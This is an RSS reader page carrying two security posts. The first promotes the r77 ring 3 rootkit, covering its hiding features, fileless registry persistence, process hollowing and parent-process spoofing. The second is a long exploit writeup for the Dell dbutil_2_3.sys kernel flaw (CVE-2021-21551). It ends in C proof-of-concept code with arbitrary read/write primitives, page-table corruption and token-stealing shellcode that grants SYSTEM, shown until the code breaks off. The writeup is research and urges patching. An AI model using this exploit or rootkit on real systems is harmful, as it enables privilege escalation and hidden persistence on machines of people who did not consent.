RSS Security

❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayFavourites

R77-Rootkit - Fileless Ring 3 Rootkit With Installer And Persistence That Hides Processes, Files, Network Connections, Etc...

Ring 3 rootkit

r77 is a ring 3 Rootkit that hides following entities from all processes:

  • Files, directories, junctions, named pipes, scheduled tasks
  • Processes
  • CPU usage
  • Registry keys & values
  • Services
  • TCP & UDP connections

It is compatible with Windows 7 and Windows 10 in both x64 and x86 editions.

Hiding by prefix

All entities where the name starts with "$77" are hidden.

Configuration System

The dynamic configuration system allows to hide processes by PID and by name, file system items by full path, TCP & UDP connections of specific ports, etc.

The configuration is stored in HKEY_LOCAL_MACHINE\SOFTWARE\$77config and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user.

The $77config key is hidden when RegEdit is injected with the rootkit.


r77 is deployable using a single file "Install.exe". It installs the r77 service that starts before the first user is logged on. This background process injects all currently running processes, as well as processes that spawn later. Two processes are needed to inject both 32-bit and 64-bit processes. Both processes are hidden by ID using the configuration system.

Uninstall.exe removes r77 from the system and gracefully detaches the rootkit from all processes.

Child process hooking

When a process creates a child process, the new process is injected before it can run any of its own instructions. The function NtResumeThread is always called when a new process is created. Therefore, it's a suitable target to hook. Because a 32-bit process can spawn a 64-bit child process and vice versa, the r77 service provides a named pipe to handle child process injection requests.

In addition, there is a periodic check every 100ms for new processes that might have been missed by child process hooking. This is necessary because some processes are protected and cannot be injected, such as services.exe.

In-memory injection

The rootkit DLL (r77-x86.dll and r77-x64.dll) can be injected into a process from memory and doesn't need to be stored on the disk. Reflective DLL injection is used to achieve this. The DLL provides an exported function that when called, loads all sections of the DLL, handles dependency loading and relocations, and finally calls DllMain.

Fileless persistence

The rootkit resides in the system memory and does not write any files to the disk. This is achieved in multiple stages.

Stage 1: The installer creates two scheduled tasks for the 32-bit and the 64-bit r77 service. A scheduled task does require a file, named $77svc32.job and $77svc64.job to be stored, which is the only exception to the fileless concept. However, scheduled tasks are also hidden by prefix once the rootkit is running.

The scheduled tasks start powershell.exe with following command line:


The command is inline and does not require a .ps1 script. Here, the .NET Framework capabilities of PowerShell are utilized in order to load a C# executable from the registry and execute it in memory. Because the command line has a maximum length of 260 (MAX_PATH), there is only enough room to perform a simple Assembly.Load().EntryPoint.Invoke().

Stage 2: The executed C# binary is the stager. It will create the r77 service processes using process hollowing. The r77 service is a native executable compiled in both 32-bit and 64-bit separately. The parent process is spoofed and set to winlogon.exe for additional obscurity. In addition, the two processes are hidden by ID and are not visible in the task manager.

No executables or DLL's are ever stored on the disk. The stager is stored in the registry and loads the r77 service executable from its resources.

The PowerShell and .NET dependencies are present in a fresh installation of Windows 7 and Windows 10. Please review the documentation for a complete description of the fileless initialization.


Detours is used to hook several functions from ntdll.dll. These low-level syscall wrappers are called by any WinAPI or framework implementation.

  • NtQuerySystemInformation
  • NtResumeThread
  • NtQueryDirectoryFile
  • NtQueryDirectoryFileEx
  • NtEnumerateKey
  • NtEnumerateValueKey
  • EnumServiceGroupW
  • EnumServicesStatusExW
  • NtDeviceIoControlFile

The only exception is advapi32.dll. Two functions are hooked to hide services. This is because the actual service enumeration happens in services.exe, which cannot be injected.

Test environment

The Test Console can be used to inject r77 to or detach r77 from individual processes.

Technical Documentation

Please read the technical documentation to get a comprehensive and full overview of r77 and its internals, and how to deploy and integrate it.

Project Page

Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

16 May 2021 at 00:00


Recently I said I was going to focus on browser exploitation with Advanced Windows Exploitation being canceled. With this cancellation, I found myself craving a binary exploitation training, with AWE now being canceled for the previous two years. I found myself enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which will be taking place at the end of this month at CanSecWest, due to the cancellation. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month, and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Staoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being an weaponed exploit. I wanted to take this blog post to showcase just a few of the “checks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are to write, conduct vulnerability research, and write code - so regardless of if you find this blog helpful/redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important mitigations like VBS/HVCI become more mainstream and that at the end of the day, these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises, but the tl;dr on the vulnerability is there is an IOCTL code that any client can trigger with a call to DeviceIoControl that eventually reaches a memmove routine, in which the user-supplied buffer from the vulnerable IOCTL routine is used in this call.

Let’s get started with the analysis. As is accustom in kernel exploits, we first need a way, generally speaking, to interact with the driver. As such, the first step is to obtain a handle to the driver. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with the driver. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link which references it, that allows clients to interact with the driver. This object is what clients interact with. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a “representation” of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\\\.\\DBUtil_2_3.

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.

The next function we need to call is DeviceIoControl. This function will allow us to pass the handle to the driver as an argument, and allow us to send data to the driver. However, we know that drivers create I/O Control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn’t fool proof, is looking for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs and drivers, especially enterprise grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function which performs many of these validations.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction incurs, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides in. We can see this in the function, by the call to memmove.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains, we see there are tons of code branches in this driver. We need to make sure that from the time our IOCTL code is checked and we are directed towards our code path, that any compare statements/etc. that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub+15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sup rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD. Obviously this compare statement will fail, and essentially an NTSTATUS code is returned back to the client of 0xC0000000D, which means STATUS_INVALID_PARAMETER. This is the driver’s way to let the client know one of the needed arguments wasn’t correct in the IOCTL call. This means that if we want to reach the memmove routine, we will at least need to send 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_5294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr[rsp+0x30], which will move the lower 32-bits of RSP, ESP, into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts a pointer to memory. Since we passed raw values of junk, these addresses are invalid. Because of this, let’s switch up our POC a bit again in order to see if we can’t get a desired result. Let’s use KUSER_SHARD_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif’s research, we will send a 0x20 byte buffer. Kasif points out that the memmove routine, before reaching the call, will select at an offset of 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, 0x42 bytes, 4 bytes of them to be exact, will be loaded into ECX.

Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue is, however, with the source address. We were attempting to target 0xFFFFF78000000800. However, our address got mangled into 0xFFFFF78042424242. This is because it seems like the lower 32-bits of one of our user-supplied QWORDS first gets added to the destination buffer. This time, if we resend the exploit and we change where 0x4242424242424242 once was with 0x0000000000000000, we can “bypass” this issue, but having a value of 0 added, meaning our target address will remain unmangled.

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the “what” (our data) and the “where” (where do we write the data). However, recall the image two images above, showcasing our successful arguments, that since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel mode address. This means, at some point between the memmove call and our invocation of DeviceIoControl, our array of QWORDS was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can actually overwrite whatever we pass to the target buffer, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343 we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to.

This means, instead of having something like this for the target address:

ffffc605`24e82998	43434343`43434343

What if we could just pass our own data as such:

43434343`43434343	DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways potentially: option one would be that we could copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if the memmmove data writes it to the output buffer.

The latter option makes sense as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to this IOCTL, meaning the input and output buffers are most likely being used by other kernel mode components/legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely it is expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially to the inverse of what we did with the arbitrary write primitive.

Talking to a peer of mine, VoidSec about my thought process, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more of reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this routine is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could setup our buffer in a way that the buffer is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, we will set the second value, similar to last time, of our QWORD array to the value we want to interact with, in this case, read, and set everything else to 0. Then, we will reuse the same array of QWORDS as an output buffer and see if anything was written to the buffer.

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instruction, we can see our input buffer for the read primitive is being propagated and setup for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall in our arbitrary write routine that the second parameter, 4343434343434343 was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever this address points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and will be placed in our output buffer! We can see just before the return from memmove, the return value is the buffer in which the data was copied into, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each array element of the QWORD array we sent, per our code, and we can see the last element will contain the dereferenced contents of the value we would like to read from! Now that we have a vanilla 1 QWORD arbitrary read/write primitive, we can now get into out exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate where the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG was fully enabled, then VBS/HVCI would then be enabled - rendering this technique useless. kCFG does still have some functionality, even when VBS/HVCI is disabled, like performing bitwise tests to ensure user mode addresses aren’t called from kernel mode. This simply just “circumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know where we want to write to is at an offset of 0x3000 (offset to .data.) + 0x10 (offset to code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which already is a kernel-mode page and is writable (you could use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation of Windows 10 after 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The Windows API function nt!MiGetPteAddress, at an offset of 0x13, contains, dynamically, the base of the page table entries as this kernel mode function is leveraged to find the base of the page table entries.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.

Now that we have calculated the page table entry for where our shellcode will be written to, let’s now dereference it in order to preserve what the PTE bits contain, in terms of permissions, so we can modify this value later

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer to nt!HalDispatchTable+0x8 with this memory address. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, which will trigger a call to this QWORD! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call nt!KeQueryIntervalProfile function call, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of ntKeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8], but we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see though that kCFG has some functionality in kernel mode, even if it isn’t implemented full scale. The routines still exist in the kernel, which would normally check a bitmap of all indirect function calls and determine if the value that is about to be placed into RAX in the above image is a “valid target”, meaning at compile time, when the bitmap was created, did the address exist and is it apart of any valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif are optimal. They bypass pretty much any memory corruption related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research:
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
	// Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
	LPVOID lpImageBase[1024];
	DWORD lpcbNeeded;
	int drivers;
	char lpFileName[1024];
	unsigned long long imageBase;

	BOOL baseofDrivers = EnumDeviceDrivers(

	// Error handling
	if (!baseofDrivers)
		printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());

	// Defining number of drivers for GetDeviceDriverBaseNameA()
	drivers = lpcbNeeded / sizeof(lpImageBase[0]);

	// Parsing loaded drivers
	for (int i = 0; i < drivers; i++)
			sizeof(lpFileName) / sizeof(char)

		// Keep looping, until found, to find user supplied driver base address
		if (!strcmp(name, lpFileName))
			imageBase = (unsigned long long)lpImageBase[i];

			// Exit loop

	return imageBase;

void exploitWork(void)
	// Store the base of the kernel
	unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

	// Storing the base of the driver
	unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

	// Print updates
	printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
	printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

	// Store nt!MiGetPteAddress+0x13
	unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

	// Obtain a handle to the driver
	HANDLE driverHandle = CreateFileA(

	// Error handling
	if (driverHandle == INVALID_HANDLE_VALUE)
		printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
		printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

		// Buffer to send to the driver (read primitive)
		unsigned long long inBuf1[4];

		// Values to send
		unsigned long long one1 = 0x4141414141414141;
		unsigned long long two1 = ntmigetpteAddress;
		unsigned long long three1 = 0x0000000000000000;
		unsigned long long four1 = 0x0000000000000000;

		// Assign the values
		inBuf1[0] = one1;
		inBuf1[1] = two1;
		inBuf1[2] = three1;
		inBuf1[3] = four1;

		// Interact with the driver
		DWORD bytesReturned1 = 0;

		BOOL interact = DeviceIoControl(

		// Error handling
		if (!interact)
			printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
			// Last member of read array should contain base of the PTEs
			unsigned long long pteBase = inBuf1[3];

			printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

			// .data section of dbutil_2_3.sys contains a code cave
			unsigned long long shellcodeLocation = driverBase + 0x3010;

			// Bitwise operations to locate PTE of shellcode page
			unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
			shellcodePte = shellcodePte & 0x7FFFFFFFF8;
			shellcodePte = shellcodePte + pteBase;

			// Print update
			printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

			// Buffer to send to the driver (read primitive)
			unsigned long long inBuf2[4];

			// Values to send
			unsigned long long one2 = 0x4141414141414141;
			unsigned long long two2 = shellcodePte;
			unsigned long long three2 = 0x0000000000000000;
			unsigned long long four2 = 0x0000000000000000;

			inBuf2[0] = one2;
			inBuf2[1] = two2;
			inBuf2[2] = three2;
			inBuf2[3] = four2;

			// Parameter for DeviceIoControl
			DWORD bytesReturned2 = 0;

			BOOL interact1 = DeviceIoControl(

			// Error handling
			if (!interact1)
				printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
				// Last member of read array should contain PTE bits
				unsigned long long pteBits = inBuf2[3];

				printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

					; Windows 10 1903 x64 Token Stealing Payload
					; Author Connor McGarr

					[BITS 64]

						mov rax, [gs:0x188]		  ; Current thread (_KTHREAD)
						mov rax, [rax + 0xb8]	  ; Current process (_EPROCESS)
						mov rbx, rax			  ; Copy current process (_EPROCESS) to rbx
						mov rbx, [rbx + 0x2f0] 	  ; ActiveProcessLinks
						sub rbx, 0x2f0		   	  ; Go back to current process (_EPROCESS)
						mov rcx, [rbx + 0x2e8] 	  ; UniqueProcessId (PID)
						cmp rcx, 4 				  ; Compare PID to SYSTEM PID
						jnz __loop			      ; Loop until SYSTEM PID is found

						mov rcx, [rbx + 0x360]	  ; SYSTEM token is @ offset _EPROCESS + 0x360
						and cl, 0xf0			  ; Clear out _EX_FAST_REF RefCnt
						mov [rax + 0x360], rcx	  ; Copy SYSTEM token to current process

						xor rax, rax			  ; set NTSTATUS STATUS_SUCCESS
						ret						  ; Done!


				// One QWORD arbitrary write
				// Shellcode is 67 bytes (67/8 = 9 unsigned long longs)
				unsigned long long shellcode1 = 0x00018825048B4865;
				unsigned long long shellcode2 = 0x000000B8808B4800;
				unsigned long long shellcode3 = 0x02F09B8B48C38948;
				unsigned long long shellcode4 = 0x0002F0EB81480000;
				unsigned long long shellcode5 = 0x000002E88B8B4800;
				unsigned long long shellcode6 = 0x8B48E57504F98348;
				unsigned long long shellcode7 = 0xF0E180000003608B;
				unsigned long long shellcode8 = 0x4800000360888948;
				unsigned long long shellcode9 = 0x0000000000C3C031;

				// Buffers to send to the driver (write primitive)
				unsigned long long inBuf3[4];
				unsigned long long inBuf4[4];
				unsigned long long inBuf5[4];
				unsigned long long inBuf6[4];
				unsigned long long inBuf7[4];
				unsigned long long inBuf8[4];
				unsigned long long inBuf9[4];
				unsigned long long inBuf10[4];
				unsigned long long inBuf11[4];

				// Values to send
				unsigned long long one3 = 0x4141414141414141;
				unsigned long long two3 = shellcodeLocation;
				unsigned long long three3 = 0x0000000000000000;
				unsigned long long four3 = shellcode1;

				unsigned long long one4 = 0x4141414141414141;
				unsigned long long two4 = shellcodeLocation + 0x8;
				unsigned long long three4 = 0x0000000000000000;
				unsigned long long four4 = shellcode2;

				unsigned long long one5 = 0x4141414141414141;
				unsigned long long two5 = shellcodeLocation + 0x10;
				unsigned long long three5 = 0x0000000000000000;
				unsigned long long four5 = shellcode3;

				unsigned long long one6 = 0x4141414141414141;
				unsigned long long two6 = shellcodeLocation + 0x18;
				unsigned long long three6 = 0x0000000000000000;
				unsigned long long four6 = shellcode4;

				unsigned long long one7 = 0x4141414141414141;
				unsigned long long two7 = shellcodeLocation + 0x20;
				unsigned long long three7 = 0x0000000000000000;
				unsigned long long four7 = shellcode5;

				unsigned long long one8 = 0x4141414141414141;
				unsigned long long two8 = shellcodeLocation + 0x28;
				unsigned long long three8 = 0x0000000000000000;
				unsigned long long four8 = shellcode6;

				unsigned long long one9 = 0x4141414141414141;
				unsigned long long two9 = shellcodeLocation + 0x30;
				unsigned long long three9 = 0x0000000000000000;
				unsigned long long four9 = shellcode7;

				unsigned long long one10 = 0x4141414141414141;
				unsigned long long two10 = shellcodeLocation + 0x38;
				unsigned long long three10 = 0x0000000000000000;
				unsigned long long four10 = shellcode8;

				unsigned long long one11 = 0x4141414141414141;
				unsigned long long two11 = shellcodeLocation + 0x40;
				unsigned long long three11 = 0x0000000000000000;
				unsigned long long four11 = shellcode9;

				inBuf3[0] = one3;
				inBuf3[1] = two3;
				inBuf3[2] = three3;
				inBuf3[3] = four3;

				inBuf4[0] = one4;
				inBuf4[1] = two4;
				inBuf4[2] = three4;
				inBuf4[3] = four4;

				inBuf5[0] = one5;
				inBuf5[1] = two5;
